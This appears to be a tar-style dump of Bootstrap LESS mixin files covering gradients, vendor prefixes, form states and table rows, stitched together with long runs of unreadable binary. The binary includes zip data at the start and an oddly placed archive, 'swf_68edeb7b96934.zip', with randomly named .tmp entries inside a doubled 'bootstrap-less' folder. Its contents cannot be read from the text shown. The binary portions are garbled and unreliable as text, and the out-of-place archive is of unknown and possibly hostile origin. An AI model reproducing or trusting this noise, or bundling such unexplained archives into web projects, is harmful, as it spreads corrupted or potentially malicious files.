cq#�BZ�Q"�gE��hUq�UA>��`kh�Ώ�9��,kѢvDN�+�B�����b<�a������Bd���},�Wh���_� �x���Y����t�)�颤.E�D��T#��eȁo���P�W�aU�=�@!��#<�_�B~[�9��%Uh�Þ�t$��68��d��r��Y�p�
�I�V���%V���n�u%�#̬fT �Az+�)�Y�ֶ=���2{��M�[��ҹI��Q?W��7j����	�|=�7��O@���b1?��UqBu=eY�z�MFd�	c�0�k��I:`��|�y����K2�$�Ir�E��+�Л���Đn�I��O=���P�Q�lm�n��+@��-�n��vz>EA��F��ћ�7*Á�eDNp�/�G�r��<l�,��ذ��{���Jn_�&l��$��DFO�?ݸ�#�s��� �8�cc��Mݶ`Z<<o"��N�ŀ�e�=V��o�8�D���������V��?�;���p����F��g�~�c��ǿ������յN]�
�{�n��m����L��]���]�ҵ$�e>�����Rn�2��_湮�_��=m���̟?�0��/N��b���5-�p]���c<�����?~���n���Vg`�\�>4v�w�+�?���O��ǟ��5{�j�CU���sZQ��j����t:�'Fm�4pY���y���%�Z��9���}�+�f�Kiy�����̛֩�����E��.���?�����_��PK?%pN[��������b_68ede727d3468.tmpPK?%pN[
�.���c_68ede727d3468.tmpPK�bootstrap-less/mixins/center-block.less000066400000000170152434265230014302 0ustar00// Center-align a block level element

.center-block() {
  display: block;
  margin-left: auto;
  margin-right: auto;
}
bootstrap-less/mixins/reset-text.less000066400000000726152434265230014045 0ustar00.reset-text() {
  font-family: @font-family-base;
  // We deliberately do NOT reset font-size.
  font-style: normal;
  font-weight: normal;
  letter-spacing: normal;
  line-break: auto;
  line-height: @line-height-base;
  text-align: left; // Fallback for where `start` is not supported
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  white-space: normal;
  word-break: normal;
  word-spacing: normal;
  word-wrap: normal;
}
bootstrap-less/mixins/table-row.less000066400000001274152434265230013634 0ustar00// Tables

.table-row-variant(@state; @background) {
  // Exact selectors below required to override `.table-striped` and prevent
  // inheritance to nested tables.
  .table > thead > tr,
  .table > tbody > tr,
  .table > tfoot > tr {
    > td.@{state},
    > th.@{state},
    &.@{state} > td,
    &.@{state} > th {
      background-color: @background;
    }
  }

  // Hover states for `.table-hover`
  // Note: this is not available for cells or rows within `thead` or `tfoot`.
  .table-hover > tbody > tr {
    > td.@{state}:hover,
    > th.@{state}:hover,
    &.@{state}:hover > td,
    &:hover > .@{state},
    &.@{state}:hover > th {
      background-color: darken(@background, 5%);
    }
  }
}
bootstrap-less/mixins/resize.less000066400000000304152434265230013232 0ustar00// Resize anything

.resizable(@direction) {
  resize: @direction; // Options: horizontal, vertical, both
  overflow: auto; // Per CSS3 UI, `resize` only applies when `overflow` isn't `visible`
}
bootstrap-less/mixins/vendor-prefixes.less000066400000014200152434265230015051 0ustar00// Vendor Prefixes
//
// All vendor mixins are deprecated as of v3.2.0 due to the introduction of
// Autoprefixer in our Gruntfile. They will be removed in v4.

// - Animations
// - Backface visibility
// - Box shadow
// - Box sizing
// - Content columns
// - Hyphens
// - Placeholder text
// - Transformations
// - Transitions
// - User Select

// Animations
.animation(@animation) {
  -webkit-animation: @animation;
  -o-animation: @animation;
  animation: @animation;
}

.animation-name(@name) {
  -webkit-animation-name: @name;
  animation-name: @name;
}

.animation-duration(@duration) {
  -webkit-animation-duration: @duration;
  animation-duration: @duration;
}

.animation-timing-function(@timing-function) {
  -webkit-animation-timing-function: @timing-function;
  animation-timing-function: @timing-function;
}

.animation-delay(@delay) {
  -webkit-animation-delay: @delay;
  animation-delay: @delay;
}

.animation-iteration-count(@iteration-count) {
  -webkit-animation-iteration-count: @iteration-count;
  animation-iteration-count: @iteration-count;
}

.animation-direction(@direction) {
  -webkit-animation-direction: @direction;
  animation-direction: @direction;
}

.animation-fill-mode(@fill-mode) {
  -webkit-animation-fill-mode: @fill-mode;
  animation-fill-mode: @fill-mode;
}

// Backface visibility
// Prevent browsers from flickering when using CSS 3D transforms.
// Default value is `visible`, but can be changed to `hidden`

.backface-visibility(@visibility) {
  -webkit-backface-visibility: @visibility;
  -moz-backface-visibility: @visibility;
  backface-visibility: @visibility;
}

// Drop shadows
//
// Note: Deprecated `.box-shadow()` as of v3.1.0 since all of Bootstrap's
// supported browsers that have box shadow capabilities now support it.

.box-shadow(@shadow) {
  -webkit-box-shadow: @shadow; // iOS <4.3 & Android <4.1
  box-shadow: @shadow;
}

// Box sizing
.box-sizing(@boxmodel) {
  -webkit-box-sizing: @boxmodel;
  -moz-box-sizing: @boxmodel;
  box-sizing: @boxmodel;
}

// CSS3 Content Columns
.content-columns(@column-count; @column-gap: @grid-gutter-width) {
  -webkit-column-count: @column-count;
  -moz-column-count: @column-count;
  column-count: @column-count;
  -webkit-column-gap: @column-gap;
  -moz-column-gap: @column-gap;
  column-gap: @column-gap;
}

// Optional hyphenation
.hyphens(@mode: auto) {
  word-wrap: break-word;
  -webkit-hyphens: @mode;
  -moz-hyphens: @mode;
  -ms-hyphens: @mode; // IE10+
  -o-hyphens: @mode;
  hyphens: @mode;
}

// Placeholder text
.placeholder(@color: @input-color-placeholder) {
  // Firefox
  &::-moz-placeholder {
    color: @color;
    opacity: 1; // Override Firefox's unusual default opacity; see https://github.com/twbs/bootstrap/pull/11526
  }
  &:-ms-input-placeholder {
    color: @color;
  }
  // Internet Explorer 10+
  &::-webkit-input-placeholder {
    color: @color;
  }
  // Safari and Chrome
}

// Transformations
.scale(@ratio) {
  -webkit-transform: scale(@ratio);
  -ms-transform: scale(@ratio); // IE9 only
  -o-transform: scale(@ratio);
  transform: scale(@ratio);
}

.scale(@ratioX; @ratioY) {
  -webkit-transform: scale(@ratioX, @ratioY);
  -ms-transform: scale(@ratioX, @ratioY); // IE9 only
  -o-transform: scale(@ratioX, @ratioY);
  transform: scale(@ratioX, @ratioY);
}

.scaleX(@ratio) {
  -webkit-transform: scaleX(@ratio);
  -ms-transform: scaleX(@ratio); // IE9 only
  -o-transform: scaleX(@ratio);
  transform: scaleX(@ratio);
}

.scaleY(@ratio) {
  -webkit-transform: scaleY(@ratio);
  -ms-transform: scaleY(@ratio); // IE9 only
  -o-transform: scaleY(@ratio);
  transform: scaleY(@ratio);
}

.skew(@x; @y) {
  -webkit-transform: skewX(@x) skewY(@y);
  -ms-transform: skewX(@x) skewY(@y); // See https://github.com/twbs/bootstrap/issues/4885; IE9+
  -o-transform: skewX(@x) skewY(@y);
  transform: skewX(@x) skewY(@y);
}

.translate(@x; @y) {
  -webkit-transform: translate(@x, @y);
  -ms-transform: translate(@x, @y); // IE9 only
  -o-transform: translate(@x, @y);
  transform: translate(@x, @y);
}

.translate3d(@x; @y; @z) {
  -webkit-transform: translate3d(@x, @y, @z);
  transform: translate3d(@x, @y, @z);
}

.rotate(@degrees) {
  -webkit-transform: rotate(@degrees);
  -ms-transform: rotate(@degrees); // IE9 only
  -o-transform: rotate(@degrees);
  transform: rotate(@degrees);
}

.rotateX(@degrees) {
  -webkit-transform: rotateX(@degrees);
  -ms-transform: rotateX(@degrees); // IE9 only
  -o-transform: rotateX(@degrees);
  transform: rotateX(@degrees);
}

.rotateY(@degrees) {
  -webkit-transform: rotateY(@degrees);
  -ms-transform: rotateY(@degrees); // IE9 only
  -o-transform: rotateY(@degrees);
  transform: rotateY(@degrees);
}

.perspective(@perspective) {
  -webkit-perspective: @perspective;
  -moz-perspective: @perspective;
  perspective: @perspective;
}

.perspective-origin(@perspective) {
  -webkit-perspective-origin: @perspective;
  -moz-perspective-origin: @perspective;
  perspective-origin: @perspective;
}

.transform-origin(@origin) {
  -webkit-transform-origin: @origin;
  -moz-transform-origin: @origin;
  -ms-transform-origin: @origin; // IE9 only
  transform-origin: @origin;
}

// Transitions

.transition(@transition) {
  -webkit-transition: @transition;
  -o-transition: @transition;
  transition: @transition;
}

.transition-property(@transition-property) {
  -webkit-transition-property: @transition-property;
  transition-property: @transition-property;
}

.transition-delay(@transition-delay) {
  -webkit-transition-delay: @transition-delay;
  transition-delay: @transition-delay;
}

.transition-duration(@transition-duration) {
  -webkit-transition-duration: @transition-duration;
  transition-duration: @transition-duration;
}

.transition-timing-function(@timing-function) {
  -webkit-transition-timing-function: @timing-function;
  transition-timing-function: @timing-function;
}

.transition-transform(@transition) {
  -webkit-transition: -webkit-transform @transition;
  -moz-transition: -moz-transform @transition;
  -o-transition: -o-transform @transition;
  transition: transform @transition;
}

// User select
// For selecting text on the page

.user-select(@select) {
  -webkit-user-select: @select;
  -moz-user-select: @select;
  -ms-user-select: @select; // IE10+
  user-select: @select;
}
bootstrap-less/mixins/forms.less000066400000005126152434265230013066 0ustar00// Form validation states
//
// Used in forms.less to generate the form validation CSS for warnings, errors,
// and successes.

.form-control-validation(@text-color: #555; @border-color: #ccc; @background-color: #f5f5f5) {
  // Color the label and help text
  .help-block,
  .control-label,
  .radio,
  .checkbox,
  .radio-inline,
  .checkbox-inline,
  &.radio label,
  &.checkbox label,
  &.radio-inline label,
  &.checkbox-inline label {
    color: @text-color;
  }
  // Set the border and box shadow on specific inputs to match
  .form-control {
    border-color: @border-color;
    .box-shadow(inset 0 1px 1px rgba(0, 0, 0, .075)); // Redeclare so transitions work
    &:focus {
      border-color: darken(@border-color, 10%);
      @shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px lighten(@border-color, 20%);
      .box-shadow(@shadow);
    }
  }
  // Set validation states also for addons
  .input-group-addon {
    color: @text-color;
    border-color: @border-color;
    background-color: @background-color;
  }
  // Optional feedback icon
  .form-control-feedback {
    color: @text-color;
  }
}

// Form control focus state
//
// Generate a customized focus state and for any input with the specified color,
// which defaults to the `@input-border-focus` variable.
//
// We highly encourage you to not customize the default value, but instead use
// this to tweak colors on an as-needed basis. This aesthetic change is based on
// WebKit's default styles, but applicable to a wider range of browsers. Its
// usability and accessibility should be taken into account with any change.
//
// Example usage: change the default blue border and shadow to white for better
// contrast against a dark gray background.
.form-control-focus(@color: @input-border-focus) {
  @color-rgba: rgba(red(@color), green(@color), blue(@color), .6);
  &:focus {
    border-color: @color;
    outline: 0;
    .box-shadow(~"inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px @{color-rgba}");
  }
}

// Form control sizing
//
// Relative text size, padding, and border-radii changes for form controls. For
// horizontal sizing, wrap controls in the predefined grid classes. `<select>`
// element gets special love because it's special, and that's a fact!
.input-size(@input-height; @padding-vertical; @padding-horizontal; @font-size; @line-height; @border-radius) {
  height: @input-height;
  padding: @padding-vertical @padding-horizontal;
  font-size: @font-size;
  line-height: @line-height;
  border-radius: @border-radius;

  select& {
    height: @input-height;
    line-height: @input-height;
  }

  textarea&,
  select[multiple] & {
    height: auto;
  }
}
bootstrap-less/mixins/nav-vertical-align.less000066400000000554152434265230015423 0ustar00// Navbar vertical align
//
// Vertically center elements in the navbar.
// Example: an element has a height of 30px, so write out `.navbar-vertical-align(30px);` to calculate the appropriate top margin.

.navbar-vertical-align(@element-height) {
  margin-top: ((@navbar-height - @element-height) / 2);
  margin-bottom: ((@navbar-height - @element-height) / 2);
}
bootstrap-less/mixins/responsive-visibility.less000066400000000553152434265230016321 0ustar00// Responsive utilities

//
// More easily include all the states for responsive-utilities.less.
.responsive-visibility() {
  display: block !important;
  table& {
    display: table !important;
  }
  tr& {
    display: table-row !important;
  }
  th&,
  td& {
    display: table-cell !important;
  }
}

.responsive-invisibility() {
  display: none !important;
}
bootstrap-less/mixins/alerts.less000066400000000401152434265230013221 0ustar00// Alerts

.alert-variant(@background; @border; @text-color) {
  background-color: @background;
  border-color: @border;
  color: @text-color;

  hr {
    border-top-color: darken(@border, 5%);
  }
  .alert-link {
    color: darken(@text-color, 10%);
  }
}
bootstrap-less/mixins/hide-text.less000066400000001076152434265230013633 0ustar00// CSS image replacement
//
// Heads up! v3 launched with only `.hide-text()`, but per our pattern for
// mixins being reused as classes with the same name, this doesn't hold up. As
// of v3.0.1 we have added `.text-hide()` and deprecated `.hide-text()`.
//
// Source: https://github.com/h5bp/html5-boilerplate/commit/aa0396eae757

// Deprecated as of v3.0.1 (will be removed in v4)
.hide-text() {
  font: ~"0/0" a;
  color: transparent;
  text-shadow: none;
  background-color: transparent;
  border: 0;
}

// New mixin to use as of v3.0.1
.text-hide() {
  .hide-text();
}
bootstrap-less/mixins/nav-divider.less000066400000000350152434265230014142 0ustar00// Horizontal dividers
//
// Dividers (basically an hr) within dropdowns and nav lists

.nav-divider(@color: #e5e5e5) {
  height: 1px;
  margin: ((@line-height-computed / 2) - 1) 0;
  overflow: hidden;
  background-color: @color;
}
bootstrap-less/mixins/reset-filter.less000066400000000370152434265230014341 0ustar00// Reset filters for IE
//
// When you need to remove a gradient background, do not forget to use this to reset
// the IE filter for IE9 and below.

.reset-filter() {
  filter: e(%("progid:DXImageTransform.Microsoft.gradient(enabled = false)"));
}
bootstrap-less/mixins/gradients.less000066400000010452152434265230013716 0ustar00// Gradients

#gradient {

  // Horizontal gradient, from left to right
  //
  // Creates two color stops, start and end, by specifying a color and position for each color stop.
  // Color stops are not available in IE9 and below.
  .horizontal(@start-color: #555; @end-color: #333; @start-percent: 0%; @end-percent: 100%) {
    background-image: -webkit-linear-gradient(left, @start-color @start-percent, @end-color @end-percent); // Safari 5.1-6, Chrome 10+
    background-image: -o-linear-gradient(left, @start-color @start-percent, @end-color @end-percent); // Opera 12
    background-image: linear-gradient(to right, @start-color @start-percent, @end-color @end-percent); // Standard, IE10, Firefox 16+, Opera 12.10+, Safari 7+, Chrome 26+
    background-repeat: repeat-x;
    filter: e(%("progid:DXImageTransform.Microsoft.gradient(startColorstr='%d', endColorstr='%d', GradientType=1)", argb(@start-color), argb(@end-color))); // IE9 and down
  }

  // Vertical gradient, from top to bottom
  //
  // Creates two color stops, start and end, by specifying a color and position for each color stop.
  // Color stops are not available in IE9 and below.
  .vertical(@start-color: #555; @end-color: #333; @start-percent: 0%; @end-percent: 100%) {
    background-image: -webkit-linear-gradient(top, @start-color @start-percent, @end-color @end-percent); // Safari 5.1-6, Chrome 10+
    background-image: -o-linear-gradient(top, @start-color @start-percent, @end-color @end-percent); // Opera 12
    background-image: linear-gradient(to bottom, @start-color @start-percent, @end-color @end-percent); // Standard, IE10, Firefox 16+, Opera 12.10+, Safari 7+, Chrome 26+
    background-repeat: repeat-x;
    filter: e(%("progid:DXImageTransform.Microsoft.gradient(startColorstr='%d', endColorstr='%d', GradientType=0)", argb(@start-color), argb(@end-color))); // IE9 and down
  }

  .directional(@start-color: #555; @end-color: #333; @deg: 45deg) {
    background-repeat: repeat-x;
    background-image: -webkit-linear-gradient(@deg, @start-color, @end-color); // Safari 5.1-6, Chrome 10+
    background-image: -o-linear-gradient(@deg, @start-color, @end-color); // Opera 12
    background-image: linear-gradient(@deg, @start-color, @end-color); // Standard, IE10, Firefox 16+, Opera 12.10+, Safari 7+, Chrome 26+
  }
  .horizontal-three-colors(@start-color: #00b3ee; @mid-color: #7a43b6; @color-stop: 50%; @end-color: #c3325f) {
    background-image: -webkit-linear-gradient(left, @start-color, @mid-color @color-stop, @end-color);
    background-image: -o-linear-gradient(left, @start-color, @mid-color @color-stop, @end-color);
    background-image: linear-gradient(to right, @start-color, @mid-color @color-stop, @end-color);
    background-repeat: no-repeat;
    filter: e(%("progid:DXImageTransform.Microsoft.gradient(startColorstr='%d', endColorstr='%d', GradientType=1)", argb(@start-color), argb(@end-color))); // IE9 and down, gets no color-stop at all for proper fallback
  }
  .vertical-three-colors(@start-color: #00b3ee; @mid-color: #7a43b6; @color-stop: 50%; @end-color: #c3325f) {
    background-image: -webkit-linear-gradient(@start-color, @mid-color @color-stop, @end-color);
    background-image: -o-linear-gradient(@start-color, @mid-color @color-stop, @end-color);
    background-image: linear-gradient(@start-color, @mid-color @color-stop, @end-color);
    background-repeat: no-repeat;
    filter: e(%("progid:DXImageTransform.Microsoft.gradient(startColorstr='%d', endColorstr='%d', GradientType=0)", argb(@start-color), argb(@end-color))); // IE9 and down, gets no color-stop at all for proper fallback
  }
  .radial(@inner-color: #555; @outer-color: #333) {
    background-image: -webkit-radial-gradient(circle, @inner-color, @outer-color);
    background-image: radial-gradient(circle, @inner-color, @outer-color);
    background-repeat: no-repeat;
  }
  .striped(@color: rgba(255,255,255,.15); @angle: 45deg) {
    background-image: -webkit-linear-gradient(@angle, @color 25%, transparent 25%, transparent 50%, @color 50%, @color 75%, transparent 75%, transparent);
    background-image: -o-linear-gradient(@angle, @color 25%, transparent 25%, transparent 50%, @color 50%, @color 75%, transparent 75%, transparent);
    background-image: linear-gradient(@angle, @color 25%, transparent 25%, transparent 50%, @color 50%, @color 75%, transparent 75%, transparent);
  }
}
bootstrap-less/mixins/size.less000066400000000177152434265230012713 0ustar00// Sizing shortcuts

.size(@width; @height) {
  width: @width;
  height: @height;
}

.square(@size) {
  .size(@size; @size);
}
bootstrap-less/bootstrap-less/swf_68edeb7b96934.zip000064400000012627152434265230016054 0ustar00PKsrN[��݈��b_68edeb7b96934.tmp�U�o�F�WV�l�"��u�#%��8�Ц�,d�:��3&�C������P���y|������x��뷩�l�%\�saE��a��j�6��s߹:�'��md׎�:�
QuL�D��EU�B�E\��h梢��TȦ�-��D���A�p���I�~Ą�\B�����u���:+lK��+�b�m�:�l��,�y�&�(��(�Rt�ॢ�����'Gij �t�ݠo�t(>M�4�j�#�nȗ�#ˍ��\ƌA�$u�."<7�'c��<콵������1�^�7m��2�t���7m���=�>u�C�!��`���l��t�|�6��j�C;鴾�t?�Q��3���b[�ˎ?+y���
��`��`{�u&S��1�����zk��Q��R���T��F�� T�v�~^��/�Ա);M���D�&:�P����,�Z�]o�����
����C.�(H3�8�ٓt�����l�<�.&��l2�N>
�xhO����Y/.��;��0��G�q��g���$�t�:��O��gd'��$�N8g�d��K
�l�'�L#W4
�u�Ϭfx��<&���s�<VJ��eњŞ���,����<3�U}�[/kɼd	g�X�T���4�P�g��/Y��$��5����z�_�U;^��,����zV��ku\��*Ö��3�`�'\/��~J�Gu�ezQ�w�(z��������ś���7w��I�__WE���}�L���0�rQu��G���=���8�3׮]
��J�"*N=��i>=���әtF���v�ɁP��s�q�����latu�V�d�~�x�ۋ�_��wE���|I�-�� I@n�B��C�G�4�5o�UM��(㕱�U�i��7L��̕�*�E���Di��|*pX��s�d��̿e�
�O1�6��D$Z>����h�ۛPKsrN[?���c_68edeb7b96934.tmp]x���Hn�|h40�P�ƻ�rκ
�c��U�����;�? @�b��b������~~����??�nXL�����I		��X�sm�ˣPCo:Mo�ț����`�
�^���Wa��גOry��&]'53~'}K��0��ϯ}V�i�U���0�ϺRu�gJ�>P�ύu/��0</�ʶ(�'y?O�$��#���x��1nv((^,�p�c$��,��J�JOM� ʲ$�E��mҀuzA�z��y2�{ڢ�'��vvꭴ� 
t�4����x엑�h���Y�d���`�MO�M`�nU�8�$���q���9�Yt_��l�!�I�|o�-ߤ;����dԦ��i�u̩���0UU�
��r[���Bq�q7<������o�%�BP�vq�d��G(��]��Q[>�7�9�%p�m�]��٦8����tBPb��M[�]��gj77K_�<G�xy�Ux����|�~�6��2�ܿR�;kt��a�D�7[��\*�*F���EW�B`��YH�t1o��|��vhq?�[3,`�g�sc'3�5�!��e�3.XwTz�7�ݐyV�7���Z	���&�¸4��ݼ�B�L!L��
���l*�*�_� ��/+��ђͽcm�$�6j�D�2��,m�2��Q��o�s�0�„���W�c���
�{�3Hu&�̎}������5�m��BV�"�/�j>�@BfP��?���,߅�z0�
VC�s�a�f���������4�(ߟe��\IVC�A-r^��d��٩Ŀ8�wq�|ϩ'X�a��v(�e�|8��L�z�ᣰ]5��xjd�_���V�g �wa�B�dPF8ҏnf��W3�6�uq)�l\<�q�'��[���.J$$V��<]Uf�M@b���*�F��`���u��~L�KUu]9��s�ee��ʩw�h*Dc��w��]8����&��(GWLl@�)xU/؅�n�L��Z�ji���ZIc�O��ׇ��AgUa���@U���k�pb���v��
�@�T$FW���>SU��we�,x���s�B
����W�q���8�A�:��Q�Ӭb��LK��t�mQ��'	���BC9������&�P�^����;�ˢ�ҹ|l)� �>oJ����,�!�\RI����m�Fs�N�P�Z���*��!Vn0�vr�M�$"���Z�
xF,���0Ū���G��3ru<C����'�-|�œ���u��FP���5���hS�D�������{���G�=Y�)Jo�C��4�u��J�Mvn��nC��.�i�	v�Z%q��]���R��n(��aw�X{s�%u(�7�@#"�����\tg|�	4��fh<��5QlV_d��A9���
7��8}eW�Ъ�\~� $�؈�K�\82/l�T*B��՘h�K��f�)�q�O�>.��q���d&�`�G�</�%�TV-
Sz豈��K�:�0�g'/)]��e�DQBSڏf�y��ӂZ��[B�ے�H��#���|��{3�SD���JI��K�EK_;�W�|Z%�@��V�6������>ߟí�����j#I<�������h�7آ��>�f�ȐX�b��
$\ʥz�a$'�-����O��� ��)�Ƭ����ݗ�U��ԷJ�a.e���oI:O�S�1߳8#��k��b-1��L���	D�-3/&��Ä~�{y��C@�f0f��R%�Ri���?��
ȯ=��W�q:b�~X�S_�.�#���jB�7��d�YC�!yQ!~S��Qo�F���Jߞ����f��R�:e���o|��	�2�c������z�(�0�k�!x+���nb�ֆ�<�D�NϿY���[
�Ht?�����:��5}24�z=ݰP�I���	?��[0݁�qc��o�5�ͮ���x��"�So����և���7��Ydd�d�~nT��Ur
q�/�(a��~��NP�Rr�w�C#�)K�M��6M��QE�z]R�x�'�)jvy��q�6�7��y�36�@އ56Lj`	E703-U��U]uL�=u]Y�Tr��bȘ�b-�̺>V���9
V���h*R���$�nlq��������$M>�	���==�����
���tE�̶Y�h-�ʁ����V�=�P#�쾶�����e��,��Tc��܊�ǖ1�V�8 ,����V�;�E����Px�2)��R�G7Ķ��3|��^ \2"l\U�����Bz�I�,y��%6�Rgb��w
�����+0�&���Y�S��ě��jq)���m&8�u:4�r̰N)�����[j����df��Q�L�� VH�>�e��`����z��$�JA0!_R[�>�|s��`֘�,͟&�u�pm�}�v�C��o,;�*��-gE�#����[�v�I��.W��#�h��Hz-6���In�alK�{�#�ܚ�ѡ���;�t��s�u}A_T+�ۨ��O`c������e��
o�:N�.��c�*F&Ut��A���;{*�W��e�A�p�6r:�Ek$i�EGx}���3��>yk����	�1��L�**&r���^ߪc���V�ƹ��+�y��I�J+��k��.����+jgRgR^M�����&�b�q���t��׽�Y� ߟlL*�j�g����*���pIA}���f��k���'�H�<�{8�6�K��|��7�K}Je��G}�b_hd��� ��#�f`@{d4�>�B8؇w�|q�p�Q�Fq��.����LP���,��B4u	_�ы
�f��Q��j������(�O���l;������}�xsGel�AB��u����<�B̵=C�i
/��m�H���H�v�RN$E��9Z�pdc��Q��]���ɉsl'g�l9��Ke/f{7���OVN��R.ިM�LJ\�6��!��?��N/E^���3O�QLڸ�?�m�<L����3|XY�����p�_�cE�}����:tob�CW�w���8	�;:���/�T�ͅ�_y
�o�Z>$���ʰ=tkC�B.�`�S�~��$?�O��sJ�3�4I$˷4Z�n�q�Dv��QF�4Z��x�FSB:
�f���Y7�ˍ�,�!���`҂/E���S�i.&8�k�6xbb�i.'"ɔ�����g������_����L�N8��ϟ
�X�^��J��>�bE�"Ƿ2]d�G��K	�,J�4�sJ��x	����+)�=�oh�qˬ#@!��A���v��O��V�����T�1�Tb�e��P���B}�N����j_t����c`�k����p��y^��f�ß�O�'�KZ(��v9l��)����b��_��=ܸ<U���rkF�6��|b��RE/@�p�P��G�s5�y�Bɲ[:�U����h>�	����v�b�(�E0V !)	��]�Ҟ[��%��
d�EYk�Kڔ���
�G�M�~G�Aܥ ~oSG��/�D��mY���8�49��Z)�ٖ������wZ�u�֓�{�/A�'�>fF;���p�g$ ��D�ۉV���q�
ּ��6u�)�
8`M����< |�vrH�d1��+�X�����i(T�l�#xjQ-�wCFZN�_<������Ԗ�r�%]���80���jP3�`�\'�3Ȍ&��P ��ն܏��/Uj��;h���r�H�*Zu��B 0(��kF��T�W��\`edj��
b��#�Pz�.^�q�zsOՔ0�v-\\��e���MlhJ�8��M�;ͣ�Pж��D
��h·:L��^���ė�-�X~"�/���6�3�8��%#�:����9��.���G�	(Ð!$jcR��$�y��#�KKN�����p	{�����/��?�QB��5�
�BiP�7�5�%WW.,�2��;Qs��7J��<]\<k"J��Ƃ�?���>d[3?� �������?=�_����a����#�0��0o��?����/���|~�Ͽ����I��Y�tݖ������+����4Y�G^dc^����~�bۗ�g���{�)\�i��_J����_��+�r����-[0=O��˄�����_���_?M���s�/|���`t:7̻��_����?EV�?�T�Ex��Y�p}�g����N��"�ǭbC�����+P�S���F����O�őt��[߭S�5I��ɲ�����e�l�o�+�������
PK?srN[��݈����b_68edeb7b96934.tmpPK?srN[?������c_68edeb7b96934.tmpPK��